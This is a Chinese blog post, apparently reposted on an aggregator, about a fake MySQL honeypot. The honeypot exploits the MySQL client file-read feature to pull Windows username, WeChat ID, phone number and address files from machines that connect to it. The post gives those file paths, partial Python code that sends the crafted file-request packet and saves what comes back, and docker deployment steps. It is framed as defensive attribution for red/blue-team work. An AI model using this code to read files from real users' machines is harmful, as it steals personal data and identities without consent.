相關聲明： 以下內(nèi)容僅限用于紅藍攻防對抗等專業(yè)領域，請勿用于非法用途。

首先，我們先講一下蜜罐的概念，你可以簡單理解較為蜜罐就是一個陷阱，故意暴露一些我們?nèi)藶樵O計好的漏洞，讓攻擊者自投羅網(wǎng)。

一、蜜罐介紹

蜜罐是對攻擊者的欺騙技術，用以監(jiān)視、檢測、分析和溯源攻擊行為，其沒有業(yè)務上的用途，所有流入/流出蜜罐的流量都預示著掃描或者攻擊行為，因此可以比較好的聚焦于攻擊流量。

蜜罐可以實現(xiàn)對攻擊者的主動誘捕，能夠詳細地記錄攻擊者攻擊過程中的許多痕跡，可以收集到大量有價值的數(shù)據(jù)，如病毒或蠕蟲的源碼、黑客的操作等，從而便于提供豐富的溯源數(shù)據(jù)。另外蜜罐也可以消耗攻擊者的時間，基于JSONP等方式來獲取攻擊者的畫像。

但是蜜罐存在安全隱患，如果沒有做好隔離，可能成為新的攻擊源。

二、Fake Mysql

這里再提一下Fake Mysql的概念，通過偽裝Mysql服務器，誘導攻擊者來連接，利用漏洞來讀取攻擊者電腦的文件從而就有了下面的內(nèi)容

三、蜜罐技術獲取手機號、微信號、地址

那么如何通過這種技術獲取攻擊者的手機號和微信呢？

正常獲取的思路

我們先來講一下讀取手機號和微信ID的正常方法，分為以下三個步驟

• 通過C:/Windows/PFRO.log獲取windows用戶名
• 通過C:/Users/用戶名/Documents/WeChat Files/All Users/config/config.data獲取wxid
• 通過C:/Users/用戶名/Documents/WeChat Files/wx_id/config/AccInfo.dat獲取地址、微信號、手機號

獲取windows用戶名

我們這里在自己的電腦中進行測試，打開C:/Windows/PFRO.log，可以看到我的用戶名是66396

獲取wxid

然后，我們訪問C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

這里可以獲取到wxid

獲取手機號、微信號、地址

可以看到手機號

還有地址、微信號都有

上面是黑客入侵后，查看電腦中的文件可以獲取到的信息，那么如何設計一個蜜罐，讓黑客在攻擊時自投羅網(wǎng)，幫助我們防守方溯源到攻擊者的信息呢？

【→所有資源關注我，私信回復“資料”獲取←】
1、網(wǎng)絡安全學習路線
2、電子書籍（白帽子）
3、安全大廠內(nèi)部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經(jīng)典題目解析
7、全套工具包
8、應急響應筆記

四、核心代碼

如何把上述過程進行自動化呢？我們可以看下核心代碼
下面的代碼主要有兩個作用

判斷是否為掃描器或者密碼爆破工具，進行交互握手，效果是掃描器直接爆3306弱口令。

如果是直接連接，去讀取設定好的文件，并寫入本地保存。

def mysql_get_file_content(filename,conn,address):logpath = os.path.abspath('.') + "/log/" + address[0]if not os.path.exists(logpath):os.makedirs(logpath)conn.sendall("xxx")try:conn.recv(1024000)except Exception as e:print(e)try:conn.sendall("xx")res1 = conn.recv(1024000)# SHOW VARIABLESif 'SHOW VARIABLES' in res1:conn.sendall("xxx")res2 = conn.recv(9999)if 'SHOW WARNINGS' in res2:conn.sendall("xxx")res3 = conn.recv(9999)if 'SHOW COLLATION' in res3:conn.sendall("xxx")res4 = conn.recv(9999)if 'SET NAMES utf8' in res4:conn.sendall("xxx")res5 = conn.recv(9999)if 'SET character_set_results=NULL' in res5:conn.sendall("xxx")conn.close()else:conn.close()else:conn.close()else:conn.close()else:try:wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filenameconn.sendall(wantfile)content=''while True:data = conn.recv(1024)print len(data)content += dataif len(data) < 1024:print 'ok'breakconn.close()item=logpath + "/" + filename.replace("/", "_").replace(":", "")+'_'+str(random.random())if len(content) > 6:with open(item, "w") as f:f.write(content)f.close()return (True,content)else:return (False,content)except Exception as e:print (e)except Exception as e:print (e)

為了防止讀取文件內(nèi)容不完整，可以加入while循環(huán)。

while True:conn, address = sv.accept()first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")global files1global usernameglobal wx_idfile=files1[0].replace('Administrator',username).replace('wx_id',wx_id)res,content = mysql_get_file_content(file,conn,address)files1.append(files1[0])files1.remove(files1[0])if res:if 'PFRO' in file:username = get_username(content)s= "xx" % (xx)cursor.execute(s)data = cursor.fetchall()if len(data)==0:s = "XX" % (xx)cursor.execute(s)db.commit()print 'success:'+ fileinsert_file(file,address,username)elif 'config.data'in file:content = contentwxid = re.findall(r'WeChatFiles\(.*)\config', content)[0]sql = "xxx" % (xxx)cursor.execute(sql)db.commit()wx_id=wxidimg = qrcode.make('weixin://contacts/profile/'+wxid)img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png') print 'success:'+ fileinsert_file(file,address,username)elif 'AccInfo' in file:content = contentphone = re.findall(r'[0-9]{11}', content)[-1]sql = "xxx" % (xxx)cursor.execute(sql)db.commit()print 'success:'+ fileinsert_file(file,address,username)else:files1=filesusername='Administrator'

部署方法

我們需要先將工具下載下來傳入服務器

然后修改webServer.py中admin的密碼，當然，你也可以更換用戶名，這個根據(jù)個人習慣來修改。

然后通過docker啟用服務

然后運行本項目

docker-compose up -d

使用方法

攻擊者通常會發(fā)現(xiàn)我們網(wǎng)站的一些漏洞，我們這里使用蜜罐技術，故意暴露我們的數(shù)據(jù)庫，我們數(shù)據(jù)庫這里設置弱口令，讓攻擊者可以連接。

攻擊者在使用navicat連接我們的數(shù)據(jù)庫時成功后，我們可以執(zhí)行代碼，讀取到它的手機號、微信號、地址

并可以在5000端口訪問后臺，輸入我們剛才設置的admin以及密碼fancypig

然后就可以看到攻擊者信息了！參考文獻

總結

以上是生活随笔為你收集整理的通过蜜罐技术获取攻击者手机号、微信号【网络安全】的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。